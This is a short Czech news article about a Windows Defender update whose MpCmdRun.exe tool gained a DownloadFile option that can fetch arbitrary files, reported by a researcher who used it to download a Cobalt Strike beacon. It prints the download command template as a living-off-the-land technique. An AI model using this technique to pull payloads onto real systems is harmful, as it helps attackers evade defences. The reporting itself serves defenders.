Windows Defender se pro správce stává nebezpečnou aplikací

Windows Defender ve Windows 10 je první obrannou linií v případě útoků malwaru a dělá to docela dobrá práce.

V jedné ze svých nových aktualizací však mocný antivirus získal nový příkaz DownloadFile, který umožní komukoli stáhnout libovolný soubor z adresy URL na určitou cestu v počítači.

Můžeme to nazvat zneužitím, protože by se dalo použít i ke stažení malwaru, což objevil bezpečnostní výzkumník Mohammad Askar, který vyslán jeho nález na Twitteru.

Jak lze program Windows Defender použít ke stažení malwaru?

Ke stažení libovolného souboru z externího zdroje do počítače je opravdu snadné použít nástroj Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe).

MpCmdRun.exe -DownloadFile -url [url] -path [cesta_k_souboru_save]

Ve svém pokusu Askar dokázal pomocí tohoto příkazového řádku stáhnout Cobalt Strike beacon, známý útočníkový nástroj.

Nový příkaz je součástí verze 4.18.2007.8-0 a vyšší, což dává útočníkům docela dobrý začátek.

Tato funkce se v zásadě obrací Windows Defender do LOLBINU (žijícího mimo liniové binární soubory), neškodného systémového souboru, který lze použít pro škodlivé účely.

Naštěstí po stažení škodlivého souboru bude detekován stejným programem Windows Defender nebo jiným antivirový software pokud jsou přítomny.

Ze spolehlivého ochranného softwaru se Windows Defender stal další možnou hrozbou, kterou budou muset pozorně sledovat správci a bezpečnostní experti.

Pokud máte nějaké návrhy nebo komentáře, nechte je prosím níže v sekci Komentáře.